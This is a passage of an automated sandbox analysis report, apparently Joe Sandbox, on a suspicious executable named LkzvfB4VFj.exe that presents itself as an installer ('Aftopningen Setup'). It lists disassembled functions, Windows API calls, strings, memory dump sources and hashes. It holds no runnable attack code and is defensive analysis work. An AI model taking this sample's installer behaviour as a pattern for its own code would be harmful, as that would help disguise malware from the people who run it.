                                                    • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LkzvfB4VFj.exe",75843410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                    • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                    • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\LkzvfB4VFj.exe",75843410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                    • Part of subcall function 004063D2: CharPrevA.USER32(?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                  • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                    • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                    • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                    • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\tranchet$Call
                                                  • API String ID: 2624150263-612975583
                                                  • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                  • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                  • Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                  • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                  Function 00406945 Relevance: .3, Instructions: 334COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                  • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                  • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                  • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                  Function 0040711C Relevance: .3, Instructions: 300COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                  • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                  • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                  • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                  Function 00404B80 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                  • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                  • DeleteObject.GDI32(00000110), ref: 00404C81
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                    • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                  • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                  • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                  • ShowWindow.USER32(?,00000000), ref: 00405169
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                  • ShowWindow.USER32(00000000), ref: 0040517B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                  • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                  • Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                  • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                  Function 00403CA7 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                  • ShowWindow.USER32(?), ref: 00403D00
                                                  • DestroyWindow.USER32 ref: 00403D14
                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                  • GetDlgItem.USER32(?,?), ref: 00403D51
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403E1A
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                  • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                  • EnableWindow.USER32(?,?), ref: 00403F68
                                                  • EnableWindow.USER32(?,?), ref: 00403F83
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                  • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                  • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                  • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID:
                                                  • API String ID: 184305955-0
                                                  • Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                  • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                  • Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                  • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                  Function 004042E6 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                  • GetSysColor.USER32(?), ref: 004043B4
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                  • lstrlenA.KERNEL32(?), ref: 004043D5
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                  • SendMessageA.USER32(00000000), ref: 0040445E
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                  • SetCursor.USER32(00000000), ref: 004044E1
                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                  • SetCursor.USER32(00000000), ref: 004044FA
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: Call$N
                                                  • API String ID: 3103080414-3438112850
                                                  • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                  • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                  • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                  • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                  Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,Aftopningen Setup,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: Aftopningen Setup$F
                                                  • API String ID: 941294808-62578608
                                                  • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                  • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                  • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                  • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                  Function 00405D66 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                  • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                    • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                    • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                  • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                  • wsprintfA.USER32 ref: 00405DDB
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                  • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                    • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\LkzvfB4VFj.exe,80000000,00000003), ref: 00405C94
                                                    • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 2171350718-1727408572
                                                  • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                  • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                  • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                  • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                  Function 004063D2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LkzvfB4VFj.exe",75843410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                  • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\LkzvfB4VFj.exe",75843410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                  • CharPrevA.USER32(?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                  Strings
                                                  • *?|<>/":, xrefs: 0040641A
                                                  • "C:\Users\user\Desktop\LkzvfB4VFj.exe", xrefs: 0040640E
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\LkzvfB4VFj.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-175677230
                                                  • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                  • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                  • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                  • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                  Function 004041E2 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                  • GetSysColor.USER32(00000000), ref: 0040423D
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                  • SetBkMode.GDI32(?,?), ref: 00404255
                                                  • GetSysColor.USER32(?), ref: 00404268
                                                  • SetBkColor.GDI32(?,?), ref: 00404278
                                                  • DeleteObject.GDI32(?), ref: 00404292
                                                  • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
